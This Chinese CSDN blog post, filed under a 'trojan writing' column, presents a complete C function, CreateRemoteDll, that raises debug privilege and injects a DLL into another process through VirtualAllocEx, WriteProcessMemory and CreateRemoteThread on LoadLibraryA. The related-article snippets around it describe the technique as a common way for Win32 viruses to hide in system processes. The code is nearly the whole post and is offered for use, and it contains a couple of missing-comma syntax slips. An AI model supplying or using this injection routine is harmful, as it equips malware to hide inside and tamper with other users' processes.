一个完整的DLL远程注入函数

最新推荐文章于 2022-11-26 14:11:45 发布
最新推荐文章于 2022-11-26 14:11:45 发布
阅读量2.9k 收藏 5
点赞数
分类专栏: 木马编写 C/SDK 文章标签: dll null token thread
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chinafe/article/details/1685271
版权

函数名称: CreateRemoteDll()

返加类型:BOOL

接受参数: DLL路径,注入进程ID

其完整代码如下:

 

BOOL CreateRemoteDll( const   char   * DllFullPath,  const  DWORD dwRemoteProcessId)
 {


    HANDLE hToken;
    if ( OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken) )
    {
        TOKEN_PRIVILEGES tkp;
        
        LookupPrivilegeValue( NULL,SE_DEBUG_NAME,&tkp.Privileges[0].Luid );//修改进程权限
        tkp.PrivilegeCount=1;
        tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
        AdjustTokenPrivileges( hToken,FALSE,&tkp,sizeof tkp,NULL,NULL );//通知系统修改进程权限
        
    }


    HANDLE hRemoteProcess;

    //打开远程线程
    if( (hRemoteProcess = OpenProcess( PROCESS_CREATE_THREAD |    //允许远程创建线程
                            PROCESS_VM_OPERATION |                //允许远程VM操作
                            PROCESS_VM_WRITE,                    //允许远程VM写
                            FALSE, dwRemoteProcessId ) )== NULL )
    {
        AfxMessageBox("OpenProcess Error!");
        return FALSE;
    }

    char *pszLibFileRemote;
    //在远程进程的内存地址空间分配DLL文件名缓冲区
    pszLibFileRemote = (char *) VirtualAllocEx( hRemoteProcess, NULL, lstrlen(DllFullPath)+1
                            MEM_COMMIT, PAGE_READWRITE);
    if(pszLibFileRemote == NULL)
    {
        AfxMessageBox("VirtualAllocEx error! ");
        return FALSE;
    }

    //将DLL的路径名复制到远程进程的内存空间
    if( WriteProcessMemory(hRemoteProcess,
                pszLibFileRemote, (void *) DllFullPath, lstrlen(DllFullPath)+1, NULL) == 0)
    {
        AfxMessageBox("WriteProcessMemory Error");
        return FALSE;
    }

    //计算LoadLibraryA的入口地址
    PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)
            GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryA");

    if(pfnStartAddr == NULL)
    {
        AfxMessageBox("GetProcAddress Error");
        return FALSE;
    }

    HANDLE hRemoteThread;
    if( (hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0
                pfnStartAddr, pszLibFileRemote, 0, NULL) ) == NULL)
    {
        AfxMessageBox("CreateRemoteThread Error");
        return FALSE;
    }

    return TRUE;
}

 

冷风
关注
专栏目录
远程线程注入--DLL注入(C++)
啊渊的专栏
08-26 194
远程线程注入Remote Thread Injection)是指通过创建远程线程的方式将代码注入到另一个进程的地址空间中。下面是一个简单的 C++ 示例,展示如何通过远程线程注入一个 DLL 到目标进程中。
DLL 远程线程注入
Quartz's Blog
10-31 774
远程线程注入首先 , 这里讲和为注入 , 通俗讲 , 就是把自己的东西强加给别人 也就是在 其他程序的运行的内存空间里面 插入自己的代码 这里提到的远程线程注入 这个算是很常用,也算是用的比较多的一种注入方式了实用代码解析打开进程 // 打开远程线程 if ((hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD |
远程DLL注入
04-15
远程DLL注入远程DLL注入远程DLL注入远程DLL注入远程DLL注入远程DLL注入
DLL远程注入技术
马说@CSDN
09-12 3726
DLL远程注入技术是目前Win32病毒广泛使用的一种技术。使用这种技术的病毒体通常位于一个DLL中,在系统启动的时候,一个EXE程序会将这个DLL加载至某些系统进程(如Explorer.exe)中运行。这样一来,普通的进程管理器就很难发现这种病毒了,而且即使发现了也很难清除,因为只要病毒寄生的进程不终止运行,那么这个DLL就不会在内存中卸载,用户也就无法在资源管理器中删除这个DLL文件,真可谓一
DLL远程注入一则
Joshua的专栏
04-24 308
1. 线程注入注入的可行性 kernel32.dll 和 user32.dll 是两个在大部分程序上都会调用的 DLL一个 DLL,在不同的进程中,不一定被映射(加载)在同一个内存地址下。但是 kernel32.dll和 user32.dll 例外。他们总是被映射到进程的内存首选地址因此,在所有使用这两个 DLL 的 进程中,这两个 DLL 的内存地址是相同的。我们在本进程获取的 kernel32.dli 中函数的地址, 在目标进程中也是一样的。 2. 涉及的 API OpenProce
dllzhuru.rar_dll 注入_dll远程注入_vc 远程注入_远程注入
09-24
三、VC++实现DLL远程注入 在“dll注入”项目中,我们使用VC++环境,通过以下步骤实现远程注入: 1. 编写DLL:创建一个DLL工程,定义导出函数,例如`DllMain`。这个函数将在目标进程中执行。 2. 编写注入程序:...
注入dll 远程注入方法
10-30
标题中的"注入dll 远程注入方法"指的是通过编程手段将DLL文件注入一个远程正在运行的进程中。这通常涉及到以下几个关键步骤: 1. **创建远程线程**:注入的核心在于创建一个新的线程在目标进程中执行。使用`...
DLL注入技术之一远程线程注入源码
最新发布
01-03
- `LoadDllInRemoteProcess`函数:这是一个核心函数,负责整个远程线程注入的过程。 - `GetTargetProcessId`函数:查找并返回目标进程的ID。 - `WriteStringToProcess`函数:将DLL路径写入目标进程的内存。 - `...
一个标准的远线程注入dll函数
xiaobai_2511的博客
03-09 445
最近在整理学习 觉得这个很高深,弄懂了觉得也就那样。 下面的代码就是远线程dll注入线程代码 //=========================================================================== // 一个标准的远线程dll注入函数 //=============================================
Dll远程注入
AlickXc的专栏
04-23 622
// Inject.cpp : 定义控制台应用程序的入口点。 // #include "stdafx.h" #include #include #include BOOL EnableDebugPriv(LPCTSTR name)  {      HANDLE h;     TOKEN_PRIVILEGES tp;     LUID id;    
病毒编程奥秘:DLL远程注入技术详解
12-25 981
DLL远程注入技术是目前Win32病毒广泛使用的一种技术。使用这种技术的病毒体通常位于一个DLL中,在系统启动的时候,一个EXE程序会将这个DLL加载至某些系统进程(如Explorer.exe)中运行。   这样一来,普通的进程管理器就很难发现这种病毒了,而且即使发现了也很难清除,因为只要病毒寄生的进程不终止运行,那么这个DLL就不会在内存中卸载,用户也就无法在资源管理器中删除这个DLL文件,真
DLL注入_远程线程注入
VI___
08-23 3545
什么是线程注入? 线程注入,是通过开启远程线程的方式,将DLL加载到目标宿主进程中的常用方式。 什么是动态链接库? 首先Windows中链接库分为两种:动态链接库DLL、静态链接库LIB。 ① 静态链接库:在运行的时候就直接把代码全部加载到程序中,调用方式比如: #prama comment (lib,"Psapi.lib") ② 动态链接库:在需要的时候加载,加载方式为...
DLL注入——使用远程线程
希望能帮助大家,希望大家多多支持,你们的支持是我前进的动力。
08-30 2010
从根本上来说,DLL注入技术要求目标进程中的一个线程调用LoadLibrary来载入我们想要的DLL。由于我们不能轻易地控制别人进程中的线程,因此这种方法要求我们在目标进程中创建一个新的线程,Windows提供了创建远程线程的函数。);hProcess:用于创建线程的进程的句柄。lpThreadAttributes:指向SECURITY_ATTRIBUTES结构的指针,该结构确定返回的句柄是否可以被子进程继承。dwStackSize:堆栈的初始大小,以字节为单位。......
远程线程注入_远程_远程线程_dll注入_注入_
10-01
4. **创建远程线程**:使用`CreateRemoteThread`函数在目标进程中创建一个新的线程,并指定DLL入口点作为线程的起始地址。这样,当新线程开始执行时,它就会调用DLL的入口点函数。 5. **清理与通信**:一旦线程启动...
DLL远程注入
diligentcat的专栏
12-17 540
DLL远程注入技术是目前Win32病毒广泛使用的一种技术。使用这种技术的病毒体通常位于一个DLL中,在系统启动的时候,一个EXE程序会将这个DLL加载至某些系统进程(如Explorer.exe)中运行。   这样一来,普通的进程管理器就很难发现这种病毒了,而且即使发现了也很难清除,因为只要病毒寄生的进程不终止运行,那么这个DLL就不会在内存中卸载,用户也就无法在资源管理器中删除这个DLL
DLL远程线程注入
Utopia的专栏
03-03 565
Windows Dll 远程线程注入 Dll动态链接库 远程线程注入 注入实例 dll注入demo下载
利用远程线程注入DLL
weixin_43799752的博客
11-26 1618
远程线程注入 dll注入
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值